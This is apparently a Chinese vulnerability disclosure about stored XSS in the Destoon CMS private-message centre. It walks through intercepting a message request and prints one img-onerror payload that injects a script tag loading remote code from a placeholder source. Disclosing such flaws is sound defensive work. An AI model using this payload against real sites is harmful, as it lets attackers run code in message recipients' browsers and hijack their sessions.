destoon新版短消息中心xss指谁打谁

### 简要描述： 发现提交了几个xss被无视...再试一次咯 destoon新版短消息中心xss指谁打谁。 ### 详细说明： 首先选取一个对象我们去发消息 [<img src="https://images.seebug.org/upload/201403/1322192292cbd0665a06ea3c26cf78acfc0faee2.png" alt="xss.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1322192292cbd0665a06ea3c26cf78acfc0faee2.png) 然后抓包，往里面填充我们的xss代码 [<img src="https://images.seebug.org/upload/201403/132219357bc305553eea633ceecffd3355c56718.png" alt="des.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/132219357bc305553eea633ceecffd3355c56718.png) 其中的xss ``` <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='xsscode';> ``` 然后我们来试着点开该信息，审查元素，代码完好 [<img src="https://images.seebug.org/upload/201403/132219585a0ce01ac7ae2f4cbf9a60981480072e.png" alt="des2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/132219585a0ce01ac7ae2f4cbf9a60981480072e.png) ### 漏洞证明： 看网络连接，加载成功了 [<img src="https://images.seebug.org/upload/201403/13222009d889c2faafcd3bd48699391654db510f.png" alt="des3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/13222009d889c2faafcd3bd48699391654db510f.png)